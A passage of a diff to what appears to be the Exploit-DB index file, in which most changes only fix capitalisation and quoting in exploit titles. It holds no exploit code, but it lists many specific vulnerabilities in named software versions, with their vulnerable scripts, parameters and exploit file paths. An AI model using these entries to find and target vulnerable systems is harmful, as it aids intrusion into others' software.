Scripting",2006-06-11,"Jaime Blasco",php,webapps,0 -28206,platforms/php/webapps/28206.txt,"Fantastic GuestBook 2.0.1 - guestbook.php HTML Injection",2006-07-11,omnipresent,php,webapps,0 -28207,platforms/windows/dos/28207.txt,"Microsoft Internet Explorer 6.0 - TriEditDocument Denial of Service",2006-07-11,hdm,windows,dos,0 -28208,platforms/asp/webapps/28208.txt,"FlexWatch 3.0 - AIndex.asp Authorization Bypass",2006-07-12,"Jaime Blasco",asp,webapps,0 +28206,platforms/php/webapps/28206.txt,"Fantastic Guestbook 2.0.1 - Guestbook.php HTML Injection",2006-07-11,omnipresent,php,webapps,0 +28207,platforms/windows/dos/28207.txt,"Microsoft Internet Explorer 6 - TriEditDocument Denial of Service",2006-07-11,hdm,windows,dos,0 +28208,platforms/asp/webapps/28208.txt,"FlexWATCH 3.0 - AIndex.asp Authorization Bypass",2006-07-12,"Jaime Blasco",asp,webapps,0 28209,platforms/multiple/remote/28209.txt,"FLV Players 8 - player.php url Parameter Cross-Site Scripting",2006-07-12,xzerox,multiple,remote,0 28210,platforms/multiple/remote/28210.txt,"FLV Players 8 - popup.php url Parameter Cross-Site Scripting",2006-07-12,xzerox,multiple,remote,0 -28211,platforms/php/webapps/28211.txt,"Lazarus GuestBook 1.6 - codes-english.php show Parameter Cross-Site Scripting",2006-07-12,simo64,php,webapps,0 -28212,platforms/php/webapps/28212.txt,"Lazarus GuestBook 1.6 - picture.php img Parameter Cross-Site Scripting",2006-07-12,simo64,php,webapps,0 -28213,platforms/windows/dos/28213.txt,"Microsoft Internet Explorer 6.0 - RevealTrans Denial of Service",2006-07-12,hdm,windows,dos,0 +28211,platforms/php/webapps/28211.txt,"Lazarus Guestbook 1.6 - codes-english.php show Parameter Cross-Site Scripting",2006-07-12,simo64,php,webapps,0 +28212,platforms/php/webapps/28212.txt,"Lazarus Guestbook 1.6 - picture.php img Parameter Cross-Site Scripting",2006-07-12,simo64,php,webapps,0 +28213,platforms/windows/dos/28213.txt,"Microsoft Internet Explorer 6 - RevealTrans Denial of Service",2006-07-12,hdm,windows,dos,0 28214,platforms/php/webapps/28214.txt,"PhotoCycle 1.0 - PhotoCycle.php Parameter Cross-Site Scripting",2006-07-13,Luny,php,webapps,0 28215,platforms/php/webapps/28215.txt,"PHP Event Calendar 1.4 - calendar.php Remote File Inclusion",2006-07-13,Solpot,php,webapps,0 28216,platforms/php/webapps/28216.txt,"FlatNuke 2.5.7 - 'index.php' Remote File Inclusion",2006-07-13,rgod,php,webapps,0 @@ -25283,7 +25284,7 @@ id,file,description,date,author,platform,type,port 28223,platforms/php/webapps/28223.txt,"Subberz Lite - UserFunc Remote File Inclusion",2006-07-14,"Chironex Fleckeri",php,webapps,0 28224,platforms/windows/remote/28224.c,"Microsoft PowerPoint 2003 - mso.dll PPT Processing Unspecified Code Execution",2006-07-14,"naveed afzal",windows,remote,0 28225,platforms/windows/remote/28225.c,"Microsoft PowerPoint 2003 - powerpnt.exe Unspecified Issue",2006-07-14,"naveed afzal",windows,remote,0 -28226,platforms/windows/remote/28226.c,"Microsoft PowerPoint 2003 - .ppt File Closure Memory Corruption",2006-07-14,"naveed afzal",windows,remote,0 +28226,platforms/windows/remote/28226.c,"Microsoft PowerPoint 2003 - '.ppt' File Closure Memory Corruption",2006-07-14,"naveed afzal",windows,remote,0 28227,platforms/windows/dos/28227.txt,"Microsoft Windows 2000/XP - Registry Access Local Denial of Service",2006-07-15,"David Matousek",windows,dos,0 28228,platforms/hardware/dos/28228.txt,"Sunbelt Kerio Personal Firewall 4.3.426 - CreateRemoteThread Denial of Service",2006-07-15,"David Matousek",hardware,dos,0 28229,platforms/php/webapps/28229.txt,"VisNetic Mail Server 8.3.5 - Multiple File Inclusion",2006-07-17,"Tan Chew Keong",php,webapps,0 @@ -25299,28 +25300,28 @@ id,file,description,date,author,platform,type,port 28239,platforms/hardware/webapps/28239.txt,"D-Link DSL-2740B - Multiple Cross-Site Request Forgery Vulnerabilities",2013-09-12,"Ivano Binetti",hardware,webapps,0 28395,platforms/windows/dos/28395.txt,"VMware 5.5.1 - Partition Table Deletion Denial of Service",2006-08-15,nop,windows,dos,0 28243,platforms/linux/webapps/28243.txt,"Synology DiskStation Manager (DSM) 4.3-3776 - Multiple Vulnerabilities",2013-09-12,"Andrea Fabrizi",linux,webapps,0 -28244,platforms/windows/dos/28244.txt,"Microsoft Internet Explorer 6.0 - DataSourceControl Denial of Service",2006-07-19,hdm,windows,dos,0 +28244,platforms/windows/dos/28244.txt,"Microsoft Internet Explorer 6 - DataSourceControl Denial of Service",2006-07-19,hdm,windows,dos,0 28245,platforms/hardware/remote/28245.pl,"Cisco Security Monitoring Analysis and Response System JBoss - Command Execution",2006-07-19,"Jon Hart",hardware,remote,0 -28246,platforms/windows/dos/28246.txt,"Microsoft Internet Explorer 6.0 - OVCtl Denial of Service",2006-07-19,hdm,windows,dos,0 +28246,platforms/windows/dos/28246.txt,"Microsoft Internet Explorer 6 - OVCtl Denial of Service",2006-07-19,hdm,windows,dos,0 28247,platforms/php/webapps/28247.txt,"IDevSpot PHPLinkExchange 1.0 - 'index.php' Remote File Inclusion",2006-07-20,r0t,php,webapps,0 28248,platforms/php/webapps/28248.txt,"IDevSpot PHPHostBot 1.0 - 'index.php' Remote File Inclusion",2006-07-20,r0t,php,webapps,0 28249,platforms/php/webapps/28249.txt,"GeoAuctions 1.0.6 Enterprise - 'index.php' d Parameter SQL Injection",2006-07-20,LBDT,php,webapps,0 28250,platforms/php/webapps/28250.txt,"Geodesic Solutions Multiple Products - 'index.php' b Parameter SQL Injection",2006-07-20,LBDT,php,webapps,0 28251,platforms/php/webapps/28251.txt,"MiniBB 1.5 - news.php Remote File Inclusion",2006-07-20,AG-Spider,php,webapps,0 -28252,platforms/windows/dos/28252.txt,"Microsoft Internet Explorer 6.0 - String To Binary Function Denial of Service",2006-07-20,hdm,windows,dos,0 +28252,platforms/windows/dos/28252.txt,"Microsoft Internet Explorer 6 - String To Binary Function Denial of Service",2006-07-20,hdm,windows,dos,0 28253,platforms/php/webapps/28253.txt,"Advanced Poll 2.0.2 - common.inc.php Remote File Inclusion",2006-07-21,Solpot,php,webapps,0 28254,platforms/multiple/remote/28254.txt,"Apache Tomcat 5 - Information Disclosure",2006-07-21,"ScanAlert Security",multiple,remote,0 28255,platforms/php/webapps/28255.txt,"Chameleon LE 1.203 - 'index.php' Directory Traversal",2006-07-21,kicktd,php,webapps,0 -28256,platforms/windows/dos/28256.html,"Microsoft Internet Explorer 6.0 - Internet.HHCtrl Click Denial of Service",2006-07-22,"Alex F",windows,dos,0 +28256,platforms/windows/dos/28256.html,"Microsoft Internet Explorer 6 - Internet.HHCtrl Click Denial of Service",2006-07-22,"Alex F",windows,dos,0 28257,platforms/linux/dos/28257.txt,"GnuPG 1.4/1.9 - Parse_Comment Remote Buffer Overflow",2006-07-22,"Evgeny Legerov",linux,dos,0 -28258,platforms/windows/dos/28258.txt,"Microsoft Internet Explorer 6.0 - Multiple Object ListWidth Property Denial of Service",2006-07-23,hdm,windows,dos,0 -28259,platforms/windows/dos/28259.txt,"Microsoft Internet Explorer 6.0 - NMSA.ASFSourceMediaDescription Stack Overflow",2006-07-24,hdm,windows,dos,0 +28258,platforms/windows/dos/28258.txt,"Microsoft Internet Explorer 6 - Multiple Object ListWidth Property Denial of Service",2006-07-23,hdm,windows,dos,0 +28259,platforms/windows/dos/28259.txt,"Microsoft Internet Explorer 6 - NMSA.ASFSourceMediaDescription Stack Overflow",2006-07-24,hdm,windows,dos,0 28260,platforms/php/webapps/28260.txt,"Lussumo Vanilla 1.0 - RootDirectory Remote File Inclusion",2006-07-24,MFox,php,webapps,0 -28261,platforms/php/webapps/28261.txt,"RadScripts - a_editpage.php filename Variable Arbitrary File Overwrite",2006-07-24,INVENT,php,webapps,0 +28261,platforms/php/webapps/28261.txt,"RadScripts - a_editpage.php Filename Variable Arbitrary File Overwrite",2006-07-24,INVENT,php,webapps,0 28262,platforms/php/webapps/28262.txt,"MusicBox 2.3.4 - Page Parameter SQL Injection",2006-07-24,"EllipSiS Security",php,webapps,0 28263,platforms/windows/dos/28263.c,"Microsoft Windows XP/2000/2003 - Remote Denial of Service",2006-07-24,"J. Oquendo",windows,dos,0 28264,platforms/php/webapps/28264.txt,"Prince Clan Chess Club 0.8 - Include.PCchess.php Remote File Inclusion",2006-07-24,OLiBekaS,php,webapps,0 -28265,platforms/windows/dos/28265.txt,"Microsoft Internet Explorer 6.0 - Native Function Iterator Denial of Service",2006-07-24,hdm,windows,dos,0 +28265,platforms/windows/dos/28265.txt,"Microsoft Internet Explorer 6 - Native Function Iterator Denial of Service",2006-07-24,hdm,windows,dos,0 28266,platforms/windows/dos/28266.txt,"AGEphone 1.28/1.38 - SIP Packet Handling Buffer Overflow",2006-07-24,"Tan Chew Keong",windows,dos,0 28267,platforms/php/webapps/28267.txt,"LinksCaffe 3.0 - links.php Multiple Parameter SQL Injection",2006-07-25,simo64,php,webapps,0 28268,platforms/php/webapps/28268.txt,"LinksCaffe 3.0 - counter.php tablewidth Parameter Cross-Site Scripting",2006-07-25,simo64,php,webapps,0 @@ -25335,11 +25336,11 @@ id,file,description,date,author,platform,type,port 28278,platforms/jsp/webapps/28278.txt,"OpenCMS 6.0/6.2 - Multiple Unauthorized Access Vulnerabilities",2006-07-26,"Meder Kydyraliev",jsp,webapps,0 28279,platforms/hardware/webapps/28279.txt,"Router ONO Hitron CDE-30364 - Cross-Site Request Forgery",2013-09-14,"Matias Mingorance Svensson",hardware,webapps,0 28280,platforms/php/webapps/28280.txt,"wwwThreads - calendar.php Cross-Site Scripting",2006-07-26,l2odon,php,webapps,0 -28281,platforms/php/webapps/28281.txt,"phpBB-auction 1.x - auction_room.php ar Parameter SQL Injection",2006-07-26,l2odon,php,webapps,0 -28282,platforms/php/webapps/28282.txt,"phpBB-auction 1.x - auction_store.php u Parameter SQL Injection",2006-07-26,l2odon,php,webapps,0 +28281,platforms/php/webapps/28281.txt,"phpBB-Auction 1.x - auction_room.php ar Parameter SQL Injection",2006-07-26,l2odon,php,webapps,0 +28282,platforms/php/webapps/28282.txt,"phpBB-Auction 1.x - auction_store.php u Parameter SQL Injection",2006-07-26,l2odon,php,webapps,0 28283,platforms/hardware/webapps/28283.txt,"ZYXEL Prestige 660H-61 ADSL Router - RPSysAdmin.HTML Cross-Site Scripting",2006-07-27,jose.palanco,hardware,webapps,0 28284,platforms/windows/remote/28284.html,"Mitsubishi MC-WorkX 8.02 - ActiveX Control (IcoLaunch) File Execution",2013-09-15,blake,windows,remote,0 -28286,platforms/windows/dos/28286.txt,"Microsoft Internet Explorer 6.0 - NDFXArtEffects Stack Overflow",2006-07-27,hdm,windows,dos,0 +28286,platforms/windows/dos/28286.txt,"Microsoft Internet Explorer 6 - NDFXArtEffects Stack Overflow",2006-07-27,hdm,windows,dos,0 28287,platforms/linux/local/28287.c,"Linux-HA Heartbeat 1.2.3/2.0.x - Insecure Default Permissions on Shared Memory",2006-07-27,anonymous,linux,local,0 28288,platforms/linux/local/28288.c,"MidiRecord2 MidiRecord.CC - Local Buffer Overflow",2006-07-27,"Dedi Dwianto",linux,local,0 28289,platforms/php/webapps/28289.txt,"Bosdates 3.x/4.0 - Payment.php Remote File Inclusion",2006-07-27,admin@jaascois.com,php,webapps,0 @@ -25348,13 +25349,13 @@ id,file,description,date,author,platform,type,port 28292,platforms/php/webapps/28292.txt,"GeoClassifieds Enterprise 2.0.5.x - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-07-27,"EllipSiS Security",php,webapps,0 28293,platforms/multiple/dos/28293.txt,"Oracle 10g - Alter Session Integer Overflow",2006-07-27,"putosoft softputo",multiple,dos,0 28294,platforms/php/webapps/28294.txt,"PHP-Nuke - INP modules.php Cross-Site Scripting",2006-07-28,l2odon,php,webapps,0 -28295,platforms/php/webapps/28295.txt,"JD-Wordpress 2.0-1.0 RC 2 for Joomla - wp-comments-post.php Remote File Inclusion",2006-07-28,Drago84,php,webapps,0 -28296,platforms/php/webapps/28296.txt,"JD-Wordpress 2.0-1.0 RC 2 for Joomla - wp-feed.php Remote File Inclusion",2006-07-28,Drago84,php,webapps,0 -28297,platforms/php/webapps/28297.txt,"JD-Wordpress 2.0-1.0 RC 2 for Joomla - wp-trackback.php Remote File Inclusion",2006-07-28,Drago84,php,webapps,0 +28295,platforms/php/webapps/28295.txt,"JD-WordPress 2.0-1.0 RC 2 for Joomla - wp-comments-post.php Remote File Inclusion",2006-07-28,Drago84,php,webapps,0 +28296,platforms/php/webapps/28296.txt,"JD-WordPress 2.0-1.0 RC 2 for Joomla - wp-feed.php Remote File Inclusion",2006-07-28,Drago84,php,webapps,0 +28297,platforms/php/webapps/28297.txt,"JD-WordPress 2.0-1.0 RC 2 for Joomla - wp-trackback.php Remote File Inclusion",2006-07-28,Drago84,php,webapps,0 28298,platforms/windows/remote/28298.txt,"Yahoo! Messenger 7.0/7.5 - Remote Search String Arbitrary Browser Navigation",2006-07-28,"Ivan Ivan",windows,remote,0 28299,platforms/windows/dos/28299.pl,"Microsoft Windows XP/2000/2003 - Graphical Device Interface Plus Library Denial of Service",2006-07-29,"Mr. Niega",windows,dos,0 28300,platforms/php/webapps/28300.txt,"Advanced Webhost Billing System 2.2.2 - contact.php Multiple Cross-Site Scripting Vulnerabilities",2006-07-29,newbinaryfile,php,webapps,0 -28301,platforms/windows/dos/28301.txt,"Microsoft Internet Explorer 6.0 - Deleted Frame Object Denial of Service",2006-07-29,hdm,windows,dos,0 +28301,platforms/windows/dos/28301.txt,"Microsoft Internet Explorer 6 - Deleted Frame Object Denial of Service",2006-07-29,hdm,windows,dos,0 28302,platforms/php/webapps/28302.txt,"Liga Manager Online 2.0 Joomla! Component - Remote File Inclusion",2006-07-30,vitux.manis,php,webapps,0 28303,platforms/php/webapps/28303.txt,"X-Scripts X-Protection 1.10 - Protect.php SQL Injection",2006-07-29,SirDarckCat,php,webapps,0 28304,platforms/php/webapps/28304.txt,"X-Scripts X-Poll 1.10 - top.php SQL Injection",2006-07-29,SirDarckCat,php,webapps,0 @@ -25372,11 +25373,11 @@ id,file,description,date,author,platform,type,port 28317,platforms/php/webapps/28317.txt,"WoW Roster 1.5 - hsList.php subdir Parameter Remote File Inclusion",2006-08-01,skulmatic,php,webapps,0 28318,platforms/php/webapps/28318.txt,"Knusperleicht Quickie - Quick_Path Parameter Remote File Inclusion",2006-08-01,"Kurdish Security",php,webapps,0 28319,platforms/php/webapps/28319.txt,"Knusperleicht FAQ 1.0 Script - 'index.php' Remote File Inclusion",2006-08-01,"Kurdish Security",php,webapps,0 -28320,platforms/php/webapps/28320.txt,"Knusperleicht GuestBook 3.5 - GB_PATH Parameter Remote File Inclusion",2006-08-01,"Kurdish Security",php,webapps,0 +28320,platforms/php/webapps/28320.txt,"Knusperleicht Guestbook 3.5 - GB_PATH Parameter Remote File Inclusion",2006-08-01,"Kurdish Security",php,webapps,0 28321,platforms/cgi/webapps/28321.pl,"Barracuda Spam Firewall 3.3.x - preview_email.cgi file Parameter Arbitrary File Access",2006-08-01,"Greg Sinclair",cgi,webapps,0 28322,platforms/php/webapps/28322.txt,"TinyPHPForum 3.6 - error.php Information Disclosure",2006-08-01,SirDarckCat,php,webapps,0 28323,platforms/php/webapps/28323.txt,"TinyPHPForum 3.6 - UpdatePF.php Authentication Bypass",2006-08-01,SirDarckCat,php,webapps,0 -28324,platforms/php/webapps/28324.txt,"Blackboard Products 6 - Multiple HTML Injection Vulnerabilities",2006-08-24,proton,php,webapps,0 +28324,platforms/php/webapps/28324.txt,"BlackBoard Products 6 - Multiple HTML Injection Vulnerabilities",2006-08-24,proton,php,webapps,0 28325,platforms/php/webapps/28325.txt,"OZJournals 1.5 - Multiple Input Validation Vulnerabilities",2006-08-02,Luny,php,webapps,0 28326,platforms/php/webapps/28326.txt,"VWar 1.x - war.php page Parameter Cross-Site Scripting",2006-08-03,mfoxhacker,php,webapps,0 28327,platforms/php/webapps/28327.txt,"VWar 1.x - war.php Multiple Parameter SQL Injection",2006-08-03,mfoxhacker,php,webapps,0 @@ -25411,17 +25412,17 @@ id,file,description,date,author,platform,type,port 28356,platforms/php/webapps/28356.txt,"VWar 1.5 - stats.php vwar_root Parameter Remote File Inclusion",2006-08-07,AG-Spider,php,webapps,0 28357,platforms/windows/remote/28357.asc,"Microsoft Windows Explorer 2000/2003/XP - Drag and Drop Remote Code Execution",2006-07-27,"Plebo Aesdi Nael",windows,remote,0 28358,platforms/linux/dos/28358.txt,"Linux Kernel 2.6.17.7 - NFS and EXT3 Combination Remote Denial of Service",2006-08-07,"James McKenzie",linux,dos,0 -28359,platforms/php/webapps/28359.txt,"PHPPrintAnalyzer 1.1 - 'index.php' Remote File Inclusion",2006-08-07,sh3ll,php,webapps,0 +28359,platforms/php/webapps/28359.txt,"phpPrintAnalyzer 1.1 - 'index.php' Remote File Inclusion",2006-08-07,sh3ll,php,webapps,0 28360,platforms/windows/remote/28360.c,"EasyCafe 2.1/2.2 - Security Restriction Bypass",2006-08-07,"Mobin Yazarlou",windows,remote,0 -28361,platforms/multiple/dos/28361.c,"Festalon 0.5 - .HES Files Remote Heap Buffer Overflow",2006-08-07,"Luigi Auriemma",multiple,dos,0 -28362,platforms/php/webapps/28362.txt,"Simple One File GuestBook 1.0 - Security Bypass",2006-08-09,omnipresent,php,webapps,0 +28361,platforms/multiple/dos/28361.c,"Festalon 0.5 - '.HES' Files Remote Heap Buffer Overflow",2006-08-07,"Luigi Auriemma",multiple,dos,0 +28362,platforms/php/webapps/28362.txt,"Simple One File Guestbook 1.0 - Security Bypass",2006-08-09,omnipresent,php,webapps,0 28363,platforms/php/webapps/28363.txt,"CLUB Nuke 2.0 - Multiple SQL Injections",2006-08-09,ASIANEAGLE,php,webapps,0 28364,platforms/php/webapps/28364.txt,"XennoBB 1.0.5/1.0.6/2.1/2.2 - profile.php Directory Traversal",2006-08-09,"Chris Boulton",php,webapps,0 28365,platforms/multiple/remote/28365.txt,"Apache 2.2.2 - CGI Script Source Code Information Disclosure",2006-08-09,"Susam Pal",multiple,remote,0 -28366,platforms/php/webapps/28366.txt,"MyBloggie 2.1.x - Mybloggie_Root_Path Parameter Multiple Remote File Inclusion",2006-06-02,sh3ll,php,webapps,0 +28366,platforms/php/webapps/28366.txt,"MyBloggie 2.1.x - MyBloggie_Root_Path Parameter Multiple Remote File Inclusion",2006-06-02,sh3ll,php,webapps,0 28367,platforms/linux/dos/28367.txt,"AlsaPlayer 0.99.x - Multiple Buffer Overflow Vulnerabilities",2006-08-09,"Luigi Auriemma",linux,dos,0 28368,platforms/multiple/remote/28368.txt,"ArcSoft Mms Composer 1.5.5/2.0 - Multiple Vulnerabilities",2006-08-09,"Collin R. Mulliner",multiple,remote,0 -28369,platforms/windows/dos/28369.dpr,"IrfanView 3.98 - .ANI Image File Denial of Service",2006-08-09,sehato,windows,dos,0 +28369,platforms/windows/dos/28369.dpr,"Irfanview 3.98 - '.ANI' Image File Denial of Service",2006-08-09,sehato,windows,dos,0 28370,platforms/php/webapps/28370.txt,"Mafia Moblog 6 - Big.php Remote File Inclusion",2006-08-10,sh3ll,php,webapps,0 28371,platforms/php/webapps/28371.txt,"YaBBSE 1.x - 'index.php' Cross-Site Scripting",2006-08-10,O.U.T.L.A.W,php,webapps,0 28372,platforms/php/webapps/28372.txt,"Tiny Web Gallery 1.5 - Image Parameter Multiple Remote File Inclusion",2006-08-10,x0r0n,php,webapps,0 @@ -25429,19 +25430,19 @@ id,file,description,date,author,platform,type,port 28374,platforms/windows/remote/28374.txt,"IPCheck Server Monitor 5.x - Directory Traversal",2006-08-10,"Tassi Raeburn",windows,remote,0 28375,platforms/windows/dos/28375.pl,"TeraCopy 2.3 - (default.mo) Language File Integer Overflow",2013-09-18,LiquidWorm,windows,dos,0 28376,platforms/windows/remote/28376.html,"McKesson - ActiveX File/Environmental Variable Enumeration",2013-09-18,blake,windows,remote,0 -28377,platforms/php/webapps/28377.txt,"Wordpress Plugin Complete Gallery Manager 3.3.3 - Arbitrary File Upload",2013-09-18,Vulnerability-Lab,php,webapps,0 +28377,platforms/php/webapps/28377.txt,"WordPress Plugin Complete Gallery Manager 3.3.3 - Arbitrary File Upload",2013-09-18,Vulnerability-Lab,php,webapps,0 28378,platforms/php/webapps/28378.txt,"MyWebland miniBloggie 1.0 - Fname Remote File Inclusion",2006-08-10,sh3ll,php,webapps,0 28379,platforms/php/webapps/28379.txt,"WEBinsta Mailing List Manager 1.3 - Install3.php Remote File Inclusion",2006-08-10,"Philipp Niedziela",php,webapps,0 28380,platforms/linux/dos/28380.txt,"Mozilla Firefox 1.0.x - JavaScript Handler Race Condition Memory Corruption",2006-08-12,"Michal Zalewski",linux,dos,0 28381,platforms/windows/dos/28381.txt,"Microsoft Windows XP/2000/2003 help - Multiple Vulnerabilities",2006-08-12,"Benjamin Tobias Franz",windows,dos,0 -28382,platforms/php/webapps/28382.txt,"WP-DB Backup For Wordpress 1.6/1.7 - edit.php Directory Traversal",2006-08-14,"marc & shb",php,webapps,0 -28383,platforms/linux/dos/28383.txt,"ImageMagick 6.x - .SGI Image File Remote Heap Buffer Overflow",2006-08-14,"Damian Put",linux,dos,0 +28382,platforms/php/webapps/28382.txt,"WP-DB Backup For WordPress 1.6/1.7 - edit.php Directory Traversal",2006-08-14,"marc & shb",php,webapps,0 +28383,platforms/linux/dos/28383.txt,"ImageMagick 6.x - '.SGI' Image File Remote Heap Buffer Overflow",2006-08-14,"Damian Put",linux,dos,0 28384,platforms/linux/dos/28384.txt,"Libmusicbrainz 2.0.2/2.1.x - Multiple Buffer Overflow Vulnerabilities",2006-08-14,"Luigi Auriemma",linux,dos,0 28385,platforms/asp/webapps/28385.txt,"BlaBla 4U - Multiple Cross-Site Scripting Vulnerabilities",2006-08-14,Vampire,asp,webapps,0 28386,platforms/linux/dos/28386.txt,"Linux-HA Heartbeat 2.0.6 - Remote Denial of Service",2006-08-13,"Yan Rong Ge",linux,dos,0 -28387,platforms/windows/dos/28387.html,"Microsoft Internet Explorer 6.0 - IMSKDIC.dll Denial of Service",2006-08-15,nop,windows,dos,0 +28387,platforms/windows/dos/28387.html,"Microsoft Internet Explorer 6 - IMSKDIC.dll Denial of Service",2006-08-15,nop,windows,dos,0 28388,platforms/php/webapps/28388.txt,"PHP-Nuke 2.0 AutoHTML Module - Local File Inclusion",2006-08-15,MosT3mR,php,webapps,0 -28389,platforms/windows/dos/28389.html,"Microsoft Internet Explorer 6.0 - MSOE.dll Denial of Service",2006-08-15,nop,windows,dos,0 +28389,platforms/windows/dos/28389.html,"Microsoft Internet Explorer 6 - MSOE.dll Denial of Service",2006-08-15,nop,windows,dos,0 28390,platforms/php/webapps/28390.txt,"Lizge 20 - 'index.php' Multiple Remote File Inclusion",2006-08-15,Crackers_Child,php,webapps,0 28391,platforms/linux/dos/28391.html,"Mozilla Firefox 1.x - XML Handler Race Condition Memory Corruption",2006-08-15,"Michal Zalewski",linux,dos,0 28392,platforms/php/webapps/28392.txt,"Zen Cart Web Shopping Cart 1.x - autoload_func.php autoLoadConfig[999][0][loadFile] Parameter Remote File Inclusion",2006-08-15,"James Bercegay",php,webapps,0 @@ -25450,8 +25451,8 @@ id,file,description,date,author,platform,type,port 28397,platforms/linux/remote/28397.sh,"GNU BinUtils 2.1x - GAS Buffer Overflow",2006-08-17,"Tavis Ormandy",linux,remote,0 28398,platforms/linux/remote/28398.txt,"MySQL 4/5 - SUID Routine Miscalculation Arbitrary DML Statement Execution",2006-08-17,"Michal Prokopiuk",linux,remote,0 28399,platforms/php/webapps/28399.txt,"CubeCart 3.0.x - Multiple Input Validation Vulnerabilities",2006-08-17,rgod,php,webapps,0 -28400,platforms/windows/remote/28400.html,"Microsoft Internet Explorer 6.0 - TSUserEX.dll ActiveX Control Memory Corruption",2006-08-17,nop,windows,remote,0 -28401,platforms/windows/dos/28401.html,"Microsoft Internet Explorer 6.0 - Visual Studio COM Object Instantiation Denial of Service",2006-08-08,XSec,windows,dos,0 +28400,platforms/windows/remote/28400.html,"Microsoft Internet Explorer 6 - TSUserEX.dll ActiveX Control Memory Corruption",2006-08-17,nop,windows,remote,0 +28401,platforms/windows/dos/28401.html,"Microsoft Internet Explorer 6 - Visual Studio COM Object Instantiation Denial of Service",2006-08-08,XSec,windows,dos,0 28402,platforms/php/webapps/28402.txt,"Blog:CMS 4.1 - Dir_Plugins Parameter Multiple Remote File Inclusion",2006-08-17,Drago84,php,webapps,0 28403,platforms/php/webapps/28403.txt,"Mambo LMTG Myhomepage 1.2 Component - Multiple Remote File Inclusion",2006-08-18,O.U.T.L.A.W,php,webapps,0 28404,platforms/php/webapps/28404.txt,"Mambo Rssxt Component 1.0 - MosConfig_absolute_path Multiple Remote File Inclusion",2006-08-18,Crackers_Child,php,webapps,0 @@ -25459,19 +25460,19 @@ id,file,description,date,author,platform,type,port 28406,platforms/php/webapps/28406.txt,"XennoBB 1.0.x/2.2 - Icon_Topic SQL Injection",2006-08-19,"Chris Boulton",php,webapps,0 28407,platforms/php/remote/28407.rb,"Western Digital Arkeia - Remote Code Execution (Metasploit)",2013-09-20,xistence,php,remote,0 28408,platforms/php/remote/28408.rb,"OpenEMR 4.1.1 Patch 14 - SQL Injection / Privilege Escalation / Remote Code Execution (Metasploit)",2013-09-20,xistence,php,remote,0 -28409,platforms/php/webapps/28409.txt,"Vtiger CRM 5.4.0 - (index.php onlyforuser parameter) SQL Injection",2013-09-20,"High-Tech Bridge SA",php,webapps,0 -28410,platforms/php/webapps/28410.txt,"Mambo Display MOSBot Manager Component - mosConfig_absolute_path Remote File Inclusion",2006-08-21,O.U.T.L.A.W,php,webapps,0 +28409,platforms/php/webapps/28409.txt,"Vtiger CRM 5.4.0 - (index.php onlyforuser Parameter) SQL Injection",2013-09-20,"High-Tech Bridge SA",php,webapps,0 +28410,platforms/php/webapps/28410.txt,"Mambo Display MOSBot Manager Component - MosConfig_absolute_path Remote File Inclusion",2006-08-21,O.U.T.L.A.W,php,webapps,0 28411,platforms/php/webapps/28411.txt,"DieselScripts Job Site - Forgot.php Multiple Cross-Site Scripting Vulnerabilities",2006-08-21,night_warrior771,php,webapps,0 28412,platforms/php/webapps/28412.txt,"DieselScripts DieselPay - 'index.php' Cross-Site Scripting",2006-08-21,night_warrior771,php,webapps,0 28413,platforms/php/webapps/28413.txt,"cPanel 10.x - dohtaccess.html dir Parameter Cross-Site Scripting",2006-08-21,preth00nker,php,webapps,0 28414,platforms/php/webapps/28414.txt,"cPanel 10.x - editit.html file Parameter Cross-Site Scripting",2006-08-21,preth00nker,php,webapps,0 28415,platforms/php/webapps/28415.txt,"cPanel 10.x - showfile.html file Parameter Cross-Site Scripting",2006-08-21,preth00nker,php,webapps,0 -28416,platforms/php/webapps/28416.txt,"Mambo EstateAgent 1.0.2 Component - mosConfig_absolute_path Remote File Inclusion",2006-08-21,O.U.T.L.A.W,php,webapps,0 +28416,platforms/php/webapps/28416.txt,"Mambo EstateAgent 1.0.2 Component - MosConfig_absolute_path Remote File Inclusion",2006-08-21,O.U.T.L.A.W,php,webapps,0 28417,platforms/php/webapps/28417.txt,"ToendaCMS 0.x/1.0.x - TCMS_Administer Parameter Remote File Inclusion",2006-08-21,You_You,php,webapps,0 28418,platforms/php/webapps/28418.txt,"PHProjekt Content Management Module 0.6.1 - Multiple Remote File Inclusion",2006-08-21,"the master",php,webapps,0 28419,platforms/php/webapps/28419.txt,"DieselScripts Smart Traffic - 'index.php' Remote File Inclusion",2006-08-21,night_warrior771,php,webapps,0 28420,platforms/windows/dos/28420.htm,"Microsoft Windows 2000 - Multiple COM Object Instantiation Code Execution Vulnerabilities",2006-08-21,nop,windows,dos,0 -28421,platforms/windows/dos/28421.htm,"Microsoft Internet Explorer 6.0 - Multiple COM Object Color Property Denial of Service Vulnerabilities",2006-08-21,XSec,windows,dos,0 +28421,platforms/windows/dos/28421.htm,"Microsoft Internet Explorer 6 - Multiple COM Object Color Property Denial of Service Vulnerabilities",2006-08-21,XSec,windows,dos,0 28422,platforms/php/webapps/28422.txt,"DieselScripts Diesel Paid Mail - Getad.php Cross-Site Scripting",2006-08-21,night_warrior771,php,webapps,0 28423,platforms/php/webapps/28423.txt,"RedBlog 0.5 - 'index.php' Remote File Inclusion",2006-08-22,Root3r_H3ll,php,webapps,0 28424,platforms/linux/remote/28424.txt,"Apache HTTP Server 1.3.35 / 2.0.58 / 2.2.2 - Arbitrary HTTP Request Headers Security",2006-08-24,"Thiago Zaninotti",linux,remote,0 @@ -25486,7 +25487,7 @@ id,file,description,date,author,platform,type,port 28433,platforms/php/webapps/28433.txt,"BigACE 1.8.2 - upload_form.php GLOBALS Parameter Remote File Inclusion",2006-08-26,Vampire,php,webapps,0 28434,platforms/php/webapps/28434.txt,"BigACE 1.8.2 - download.cmd.php GLOBALS Parameter Remote File Inclusion",2006-08-26,Vampire,php,webapps,0 28435,platforms/php/webapps/28435.txt,"BigACE 1.8.2 - admin.cmd.php GLOBALS Parameter Remote File Inclusion",2006-08-26,Vampire,php,webapps,0 -28436,platforms/php/webapps/28436.txt,"AlstraSoft Video Share Enterprise 4.x - MyajaxPHP.php Remote File Inclusion",2006-08-26,night_warrior771,php,webapps,0 +28436,platforms/php/webapps/28436.txt,"Alstrasoft Video Share Enterprise 4.x - MyajaxPHP.php Remote File Inclusion",2006-08-26,night_warrior771,php,webapps,0 28437,platforms/php/webapps/28437.txt,"Mambo/Joomla Com_comprofiler 1.0 Plugin - class.php Remote File Inclusion",2006-08-26,Matdhule,php,webapps,0 28438,platforms/windows/remote/28438.html,"Microsoft Internet Explorer 5.0.1 - Daxctle.OCX Spline Method Heap Buffer 